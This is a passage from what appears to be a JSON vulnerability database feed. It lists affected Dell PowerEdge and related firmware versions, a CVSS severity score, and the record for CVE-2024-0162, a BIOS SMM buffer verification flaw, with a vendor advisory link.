"cpe23Uri" : "cpe:2.3:h:dell:poweredge_r930:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m630_\\(pe_vrtx\\)_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m630_\\(pe_vrtx\\):-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m830_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m830:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m830_\\(pe_vrtx\\)_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m830_\\(pe_vrtx\\):-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc830_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc830:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r830_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r830:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6320_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6320:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t130_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t130:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r230_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r230:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_storage_nx3240_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_storage_nx3240:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_storage_nx3340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_storage_nx3340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:storage_nx3230_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:storage_nx3230:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:storage_nx3330_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:storage_nx3330:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:storage_nx430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:storage_nx430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc450_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc450:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc650_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc650:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc750xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc750xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc6520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.13.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc6520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_6420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_6420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc740xd_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc740xd:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc740xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc740xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xc940_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xc940:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:emc_xc_core_xcxr2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:emc_xc_core_xcxr2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc6320_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc6320:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc730_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc730:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xc730xd_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xc730xd:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.4, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.0, "impactScore" : 5.8 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-02-04T17:29Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0162", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000222812/dsa-2024-004-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000222812/dsa-2024-004-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000222812/dsa-2024-004-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability", "name" : "https://www.dell.com/support/kbdoc/en-us/000222812/dsa-2024-004-security-update-for-dell-poweredge-server-bios-for-an-improper-smm-communication-buffer-verification-vulnerability", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an Improper SMM communication buffer verification vulnerability. A local low privileged attacker could potentially exploit this vulnerability leading to out-of-bound read/writes to SMRAM." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r660_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r660:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx760c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx760c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r860_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r860:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r960_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r960:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_hs5610_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_hs5610:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_hs5620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_hs5620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r660xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r660xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xs_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t560_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t560:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r760xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.0.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r760xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe9680_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe9680:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr5610_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.8.0", "cpe_name" : [ ] 